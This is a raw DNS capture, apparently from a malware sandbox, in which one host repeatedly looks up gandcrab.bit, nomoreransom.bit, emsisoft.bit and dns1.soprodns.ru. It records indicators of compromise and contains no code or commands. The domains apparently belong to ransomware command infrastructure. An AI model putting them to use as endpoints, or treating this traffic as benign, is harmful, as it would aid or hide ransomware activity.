Sep 1, 2022 00:02:55.282820940 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:55.304130077 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.325848103 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:02:55.844996929 CEST	192.168.2.3	8.8.8.8	0x8ac0	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.932115078 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:55.953111887 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:55.974494934 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:55.995863914 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:56.017085075 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:02:56.404357910 CEST	192.168.2.3	8.8.8.8	0xc34e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.411904097 CEST	192.168.2.3	8.8.8.8	0xc34e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.447629929 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:57.467935085 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.492444992 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:57.512286901 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:57.542714119 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:02:57.924940109 CEST	192.168.2.3	8.8.8.8	0xe6aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:58.928544044 CEST	192.168.2.3	8.8.8.8	0xe6aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:59.943011045 CEST	192.168.2.3	8.8.8.8	0xe6aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.017366886 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:00.036817074 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.057399988 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:00.076893091 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:00.100399017 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:00.563648939 CEST	192.168.2.3	8.8.8.8	0x1ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.554763079 CEST	192.168.2.3	8.8.8.8	0x1ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.601682901 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:01.623106956 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.644612074 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:01.665771961 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:01.687030077 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:02.153387070 CEST	192.168.2.3	8.8.8.8	0x9670	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:02.801975012 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:02.822494030 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:02.844405890 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:02.900983095 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:02.922605991 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:03.343214035 CEST	192.168.2.3	8.8.8.8	0x101c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.427838087 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:03.448040962 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.466197014 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:03.486265898 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:03.506251097 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:03.962084055 CEST	192.168.2.3	8.8.8.8	0x1236	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:04.974921942 CEST	192.168.2.3	8.8.8.8	0x1236	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.594440937 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:05.617213011 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.639385939 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:05.661525011 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:05.683602095 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:06.123651028 CEST	192.168.2.3	8.8.8.8	0x32f7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.260365963 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:06.280270100 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.300781012 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:06.319112062 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:06.339869022 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:06.701911926 CEST	192.168.2.3	8.8.8.8	0xf50d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.240674019 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:07.276021957 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.301197052 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:07.325311899 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:07.346616983 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:08.098186970 CEST	192.168.2.3	8.8.8.8	0x5b1c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.720036983 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:08.745096922 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.807703018 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:08.828383923 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:08.846909046 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:11.312613964 CEST	192.168.2.3	8.8.8.8	0xb93e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.124238968 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:13.145962954 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.168036938 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:13.188986063 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:13.209944010 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:13.699589014 CEST	192.168.2.3	8.8.8.8	0x78aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:14.710131884 CEST	192.168.2.3	8.8.8.8	0x78aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.711199999 CEST	192.168.2.3	8.8.8.8	0x78aa	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.883177996 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:15.903464079 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.922110081 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:15.942186117 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:15.960644960 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:16.393064976 CEST	192.168.2.3	8.8.8.8	0xd2e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:17.397872925 CEST	192.168.2.3	8.8.8.8	0xd2e7	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.001125097 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:18.020601034 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.040652990 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:18.060822964 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.082511902 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:18.621407986 CEST	192.168.2.3	8.8.8.8	0xe3b2	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.657192945 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:18.677170992 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.697258949 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:18.717463970 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:18.737468004 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:19.167845011 CEST	192.168.2.3	8.8.8.8	0x6266	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.219196081 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:19.239136934 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.259211063 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:19.277164936 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.297074080 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:19.834583998 CEST	192.168.2.3	8.8.8.8	0x8bb8	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.952431917 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:19.972138882 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:19.992460012 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:20.011368036 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.034172058 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:20.228393078 CEST	192.168.2.3	8.8.8.8	0x3233	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.265758991 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:20.284135103 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.304409027 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:20.324394941 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:20.348262072 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:20.534615040 CEST	192.168.2.3	8.8.8.8	0x9a4b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.523137093 CEST	192.168.2.3	8.8.8.8	0x9a4b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.620418072 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:21.642301083 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.664385080 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:21.687511921 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:21.709351063 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:21.888966084 CEST	192.168.2.3	8.8.8.8	0x6c47	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:22.898207903 CEST	192.168.2.3	8.8.8.8	0x6c47	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:22.935939074 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:22.956962109 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:22.978908062 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:23.000022888 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:23.021548986 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:23.209656954 CEST	192.168.2.3	8.8.8.8	0x878d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:23.980442047 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:23.998657942 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:24.019182920 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:24.040007114 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:24.060420036 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:24.239500046 CEST	192.168.2.3	8.8.8.8	0xa1ca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.226500988 CEST	192.168.2.3	8.8.8.8	0xa1ca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.263760090 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:25.281759977 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.300157070 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:25.320561886 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.341169119 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:25.538189888 CEST	192.168.2.3	8.8.8.8	0xa11d	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.576621056 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:25.594151020 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.612011909 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:25.632008076 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:25.650229931 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:25.840779066 CEST	192.168.2.3	8.8.8.8	0xc72e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.836159945 CEST	192.168.2.3	8.8.8.8	0xc72e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.882740974 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:26.907030106 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.929732084 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:26.954768896 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:26.976847887 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:27.174635887 CEST	192.168.2.3	8.8.8.8	0xb6ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.164587021 CEST	192.168.2.3	8.8.8.8	0xb6ea	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.343839884 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:28.363595009 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.520062923 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:28.538480043 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:28.558638096 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:28.762604952 CEST	192.168.2.3	8.8.8.8	0xe04e	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:29.344712973 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:29.362481117 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:29.383908987 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:29.402066946 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:30.012593985 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:30.204734087 CEST	192.168.2.3	8.8.8.8	0x83d5	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:30.891808033 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:31.975245953 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:31.996526957 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:32.036712885 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.055555105 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:32.280885935 CEST	192.168.2.3	8.8.8.8	0x14b6	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.339962959 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:32.361099958 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.382333040 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:32.403374910 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:32.424187899 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:32.614773035 CEST	192.168.2.3	8.8.8.8	0xedca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.602144957 CEST	192.168.2.3	8.8.8.8	0xedca	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.674870014 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:33.695070028 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.715890884 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:33.736226082 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:33.756469965 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:33.940355062 CEST	192.168.2.3	8.8.8.8	0xa3fc	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:34.015136957 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:34.032989979 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:34.053456068 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:34.075906992 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
